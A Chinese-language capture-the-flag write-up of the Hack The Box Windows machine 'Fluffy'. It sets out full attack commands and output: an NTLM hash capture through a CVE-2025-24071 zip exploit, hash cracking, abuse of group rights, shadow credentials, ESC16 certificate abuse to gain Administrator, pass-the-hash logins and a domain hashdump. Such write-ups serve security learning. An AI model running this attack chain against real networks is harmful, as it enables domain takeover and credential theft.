基本信息

https://app.hackthebox.com/machines/Fluffy
10.10.11.69

1	As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

端口扫描

没有web端口，常规windows域端口：

$ nmap -sC -sV -Pn 10.10.11.69
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-26 15:25 JST
Nmap scan report for 10.10.11.69
Host is up (0.18s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-26 13:05:42Z)
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
|_ssl-date: 2025-05-26T13:07:07+00:00; +6h38m55s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-26T13:07:05+00:00; +6h38m55s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
|_ssl-date: 2025-05-26T13:07:07+00:00; +6h38m55s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-26T13:07:05+00:00; +6h38m55s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h38m54s, deviation: 0s, median: 6h38m54s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-05-26T13:06:25
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 189.44 seconds

SMB

给出的账号密码尝试访问smb share，可以看到一个IT,里面是两个在用的程序和一个pdf：

Upgrade_Notice.pdf

内容是一些相关漏洞的信息：

CVE-2025-24071 to p.agila

根据pdf信息提示，找到：

ThemeHackers/CVE-2025-24071: Windows File Explorer Spoofing Vulnerability (CVE-2025-24071)
https://github.com/ThemeHackers/CVE-2025-24071

制作一个zip上传，得到p.agila访问hash：

python3 exploit.py -f miao -i 10.10.14.13

sudo python3 Responder.py -i 10.10.14.13 -v

# put exploit.zip

破解出来密码：

1
2
3

sudo hashcat -m 5600 hash.txt ~/Tools/dict/rockyou.txt

prometheusx-303

bloodhound

常规bloodhound收集信息分析

1	bloodhound-python -u p.agila -p 'prometheusx-303' -d 'fluffy.htb' -ns 10.10.11.69 --zip -c All -dc 'dc01.fluffy.htb'

可以看到p.agila对service accounts的GenericAll：

然后该组成员之间互相GenericWrite：

p.agila to winrm_svc

所以就添加自己到该组中，然后利用成员互相之间的GenericWrite

faketime "$(curl -sik http://10.10.11.69:5985 | grep -i 'Date: ' | sed s/'Date: '//g)" bash

# 添加自己到SERVICE ACCOUNTS组中
bloodyAD --host 10.10.11.69 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' add groupMember 'SERVICE ACCOUNTS' 'p.agila'

# shadow creds
certipy-ad shadow auto -username p.agila@fluffy.htb -password 'prometheusx-303' -account winrm_svc

[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767

# 其他两个用户也一样
[*] NT hash for 'ldap_svc': 22151d74ba3de931a352cba1f9393a37
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8

user flag

Winrm_svc用户winrm登录：

1	evil-winrm -i 10.10.11.69 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767

ESC16 to root

这里需要最新的certipy-ad,官方分支已经都合并了：

ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
https://github.com/ly4k/Certipy

可以发现ESC16:

06 ‐ Privilege Escalation · ly4k/Certipy Wiki
https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally

certipy find -u 'ca_svc' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -target fluffy.htb  -stdout -vulnerable

fluffy-DC01-CA
DC01.fluffy.htb
1.3.6.1.4.1.311.25.2

按照wiki一步步，使用前面的p.agila作为attacker，ca_svc作为victim：

bloodyAD --host 10.10.11.69 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' add groupMember 'SERVICE ACCOUNTS' 'p.agila'

# read UPN
certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -user 'ca_svc' read

# 更改ca_svc的UPN
certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -target 'dc01.fluffy.htb'  -upn 'administrator' -user 'ca_svc' update

# 请求证书
certipy req -dc-ip 10.10.11.69 -u 'ca_svc' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'

# 还原UPN
certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -target 'dc01.fluffy.htb'  -upn 'ca_svc' -user 'ca_svc' update

# 证书认证
certipy auth -pfx administrator.pfx -username 'administrator' -domain fluffy.htb -dc-ip 10.10.11.69

[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e

root flag

Administrator hash登录：

1	evil-winrm -i 10.10.11.69 -u Administrator -H 8da83a3fa618b6e3a00e93f676c92a6e

hashdump

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9c3442d41139f13bd02f0695d56362b9:::
ca_svc:1103:aad3b435b51404eeaad3b435b51404ee:ca0f4f9e9eb8a092addf53bb03fc98c8:::
ldap_svc:1104:aad3b435b51404eeaad3b435b51404ee:22151d74ba3de931a352cba1f9393a37:::
p.agila:1601:aad3b435b51404eeaad3b435b51404ee:a51fede5012110e9a65bd3f470513867:::
winrm_svc:1603:aad3b435b51404eeaad3b435b51404ee:33bd09dcd697600edf6b3a7af4875767:::
j.coffey:1605:aad3b435b51404eeaad3b435b51404ee:dff933046fa0943ac993d35a054235e3:::
j.fleischman:1606:aad3b435b51404eeaad3b435b51404ee:10842ead8d1d060a2de1394e4b2ea460:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7a9950c26fe9c3cbfe5b9ceaa21c9bfd:::
meterpreter >

参考资料

ThemeHackers/CVE-2025-24071: Windows File Explorer Spoofing Vulnerability (CVE-2025-24071)
https://github.com/ThemeHackers/CVE-2025-24071
ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
https://github.com/ly4k/Certipy
06 ‐ Privilege Escalation · ly4k/Certipy Wiki
https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally
ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
https://github.com/ly4k/Certipy
06 ‐ Privilege Escalation · ly4k/Certipy Wiki
https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally

Fluffy - HackTheBox

2025-05-26